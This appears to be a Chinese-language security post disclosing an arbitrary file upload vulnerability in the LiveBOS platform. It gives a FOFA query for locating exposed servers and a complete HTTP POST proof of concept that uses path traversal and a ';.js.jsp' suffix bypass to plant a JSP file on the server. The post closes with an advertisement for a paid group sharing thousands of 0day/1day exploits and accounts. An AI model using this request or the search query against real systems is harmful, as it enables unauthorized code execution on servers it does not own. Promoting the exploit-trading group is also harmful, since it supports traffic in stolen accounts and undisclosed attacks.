介绍:
LiveBOS灵动业务架构平台,是面向对象的业务支撑平台与建模工具。在LiveBos的UploadImage.do接口中,发现了一处任意文件上传漏洞,攻击者可利用该漏洞上传任意文件。
fofa:
body="Power by LiveBOS"
poc:
POST /feed/UploadFile.do;.js.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxegqoxxi
Connection: close
---WebKitFormBoundaryxegqoxxi
Content-Disposition:form-data; name="file"; filename="/../../../../rce.jsp"
Content-Type: image/jpeg
<%@ page import="java.io.File" %>
<%
out.println("pppppppppoooooooocccccccccccc");
String filePath = application.getRealPath(request.getServletPath());
new File(filePath).delete();
%>
---WebKitFormBoundaryxegqoxxi--
连接地址:/1.jsp;.js.jsp
内部福利介绍-更新啦,网络安全百分之八十的资源都可以在这找到!涵盖了POC库、账号共享、文档库、资源网获取、会员专属群,做你的网络安全资源大全!
近期更新的0day/1day(包含公开和未公开漏洞-仅列举部分)漏洞整理更新至9000+
👇内容太多扫描二维码查看详细介绍👇